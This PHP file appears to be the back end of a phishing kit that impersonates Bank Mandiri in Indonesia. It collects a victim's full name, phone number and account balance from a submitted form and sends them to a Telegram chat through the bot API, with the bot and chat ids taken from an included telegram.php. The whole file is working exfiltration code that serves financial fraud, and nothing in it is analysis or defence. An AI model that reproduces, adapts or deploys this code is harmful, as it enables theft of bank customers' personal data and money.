<?php
session_start();
include "./telegram.php";

$nomor = $_POST['nomor'];
$nama = $_POST['nama'];
$saldo = $_POST['saldo'];

$_SESSION['nomor'] = $nomor;
$_SESSION['nama'] = $nama;
$_SESSION['saldo'] = $saldo;

$message = "
──────────────────────
- BANK MANDIRI | INDONESIA - 
──────────────────────

• NAMA LENGKAP : ".$nama."
• NO HANDPHONE : ".$nomor."
• SALDO SEKARANG : ".$saldo."
──────────────────────";

function sendMessage($telegram_id, $message, $id_bot) {
    $url = "https://api.telegram.org/bot" . $id_bot . "/sendMessage?parse_mode=markdown&chat_id=" . $telegram_id;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true
    );
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}

sendMessage($telegram_id, $message, $id_bot);
?>